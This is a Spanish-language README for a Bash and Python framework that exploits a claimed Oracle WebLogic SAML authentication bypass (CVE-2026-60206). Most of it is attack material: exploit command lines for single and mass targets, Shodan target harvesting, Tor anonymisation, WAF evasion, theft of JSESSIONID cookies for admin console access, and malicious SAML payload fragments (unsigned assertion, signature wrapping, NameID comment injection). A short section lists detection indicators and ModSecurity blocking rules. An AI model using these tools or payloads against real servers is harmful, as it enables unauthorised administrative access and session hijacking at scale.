
👾 CVE-2026-60206 - Framework de Explotación de Bypass de Autenticación SAML de Oracle WebLogic ⚡Versiones Bash y Python. Características: --detect verificación segura, --exploit combo/unsigned/xsw/nameid/all, --shodan integración, --tor soporte, escaneo masivo, salida JSON/CSV/JSONL, validación de cookies. 🛡️ CVSS 9.9 Crítico - Úsalo éticamente, mantente legal. 🔒

Framework de Explotación y Escáner Masivo
Solo para pruebas de seguridad autorizadas.
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas.
Los autores y colaboradores no son responsables de ningún uso indebido o daño causado por este software. Los usuarios son los únicos responsables de asegurarse de contar con permiso escrito explícito del propietario del objetivo antes de realizar las pruebas. El acceso no autorizado a sistemas informáticos es ilegal según la Computer Fraud and Abuse Act (CFAA) y leyes similares en todo el mundo.
Al utilizar este software, usted acepta:
⚠️ ADVERTENCIA: Esta vulnerabilidad se está explotando activamente en la naturaleza. El uso no autorizado puede acarrear graves consecuencias legales.
CVE-2026-60206 es una vulnerabilidad crítica de omisión de autenticación no autenticada en la implementación SAML (Security Assertion Markup Language) de Oracle WebLogic Server. Permite a atacantes remotos omitir la autenticación SAML y obtener acceso administrativo a la consola de WebLogic sin credenciales válidas.
Inyección SAML: La vulnerabilidad se origina por una validación incorrecta de las aserciones SAML. Los atacantes pueden crear respuestas SAML maliciosas que omiten las comprobaciones de autenticación.
Omisión de Firma: La vulnerabilidad permite omitir la validación de firmas XML mediante ataques de XML Signature Wrapping (XSW), en los que los atacantes envuelven aserciones maliciosas con firmas legítimas.
Manipulación de NameID: Los atacantes pueden inyectar comentarios o manipular el campo NameID para hacerse pasar por usuarios privilegiados.
Acceso de Administrador: La explotación exitosa concede al atacante acceso administrativo a la consola de WebLogic Server con control total.
El multi-exploit educativo completo encadena múltiples vectores de ataque SAML para lograr la omisión de autenticación, con funciones avanzadas para escaneo masivo, cookies y acceso administrativo.
--detect)El verificador seguro realiza una detección de vulnerabilidades no intrusiva sin ejecutar cargas útiles dañinas ni realizar cambios en el sistema.
curl (para la versión Bash)pip (para la librería requests, versión Python)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] La versión Bash funciona solo con
curly no tiene dependencias externas. La versión Python requiererequestsyurllib3(opcional:shodanpara la integración con Shodan).
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
⚠️ Importante: Esta vulnerabilidad afecta a implementaciones de WebLogic Server autoalojadas. Aplique el Oracle CPU de julio de 2026 de inmediato.
La vulnerabilidad permite a los atacantes omitir la autenticación SAML creando respuestas SAML maliciosas que son validadas incorrectamente por la implementación SAML de WebLogic.
Endpoint Vulnerable:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
Aserción sin firmar
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
XML Signature Wrapping (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
Inyección de comentarios en NameID
<saml2:NameID Format="...">
lowpriv</saml2:NameID>
La explotación exitosa produce una cookie JSESSIONID, que concede acceso administrativo a la consola de WebLogic.
La cookie robada se puede utilizar para acceder a:
Busque en los registros de WebLogic:
access.log – solicitudes a /saml2/sp/acs, /saml2/acs con parámetros SAML inusualesdomain.log – intentos de omisión de autenticación con aserciones SAML no válidasdiagnostic.log – errores de análisis SAML o fallos de validación de firmaSAMLResponse que contengan:
<saml2:Assertion><saml2:NameID>javascript: o eval() en los parámetrosconfig.xml, jps-config.xml)autodeployweblogic.security modificados# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"
| Atributo | Valor |
|---|
| 📅 Descubierta | Julio de 2026 (Oracle CPU) |
| ⚠️ Puntuación CVSS | 9.9 (CRÍTICA) |
| 📋 CISA KEV | Añadida el 21 de julio de 2026 |
| 🎯 Productos Afectados | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 Versiones Corregidas | Oracle CPU julio de 2026 |
| 🔓 Autenticación | No requerida (Pre-Auth) |
| 🌍 Explotación Activa | Confirmada en la naturaleza (julio de 2026) |
| Característica | Descripción |
|---|
| 🚀 Exploit Multi-Vector | 7 vectores de ataque: unsigned, xsw_v1-4, nameid, combo |
| 💻 Escaneo Masivo | Escaneo concurrente con grupo de hilos (Python) / FIFO (Bash) |
| 🔐 Robo de Cookies | Roba JSESSIONID para secuestro de sesión |
| 👑 Acceso a Consola de Administración | Acceso administrativo completo a la consola de WebLogic |
| 📁 Detección de Versión | Detecta versiones de WebLogic y estado de vulnerabilidad |
| 🌐 Escaneo por Lotes | Explotación masiva de múltiples objetivos con hilos |
| 🎯 Detección Segura | Indicador --detect opcional para verificación no intrusiva de vulnerabilidad |
| 🧩 Integración con Shodan | Carga objetivos directamente desde la búsqueda de Shodan |
| 🔍 Soporte Tor | Anonimiza el escaneo con proxy Tor |
| 📊 Múltiples Formatos de Salida | Salida en streaming JSON, CSV, JSONL |
| 🪟 Multiplataforma | Compatible con Linux, macOS, BSD, Alpine, WSL |
| 🔒 Seguro para Hilos | Usa mecanismos de bloqueo para operaciones concurrentes |
| 📋 Guardado Automático de Sesión | Guarda cookies exitosas para uso posterior |
| ⚙️ Omisión de WAF | Rotación de User-Agent y retardos aleatorios |
| Vector | Descripción |
|---|
unsigned | Aserción SAML no autenticada sin firma |
xsw_v1 | XML Signature Wrapping - Múltiples aserciones |
xsw_v2 | XSW - Omisión de firma enveloped |
xsw_v3 | XSW - Manipulación de espacios de nombres |
xsw_v4 | XSW - Inyección de múltiples aserciones |
nameid | Inyección de comentarios en NameID |
combo | Ataque combinado (unsigned + XSW + NameID) |
| Característica | Descripción |
|---|
| 🔍 Detección de WebLogic | Identifica instancias de WebLogic mediante LoginForm.jsp |
| 📊 Detección de Versión | Detecta versiones específicas de WebLogic y niveles de parche |
| 🧪 Descubrimiento de Endpoints SAML | Comprueba endpoints SAML ACS |
| 🔒 No Intrusivo | Solo identifica versiones vulnerables |
| 📋 Salida JSON/CSV | Exporta resultados para informes |
| 🔄 Escaneo Masivo | Escanea múltiples objetivos con soporte de hilos |
| Versión de Oracle WebLogic | Estado |
|---|
| 12.2.1.4.0 | 🔴 VULNERABLE |
| 14.1.1.0.0 | 🔴 VULNERABLE |
| 14.1.2.0.0 | 🔴 VULNERABLE |
| 15.1.1.0.0 | 🔴 VULNERABLE |
| Otras versiones | Consulta el Oracle CPU de julio de 2026 |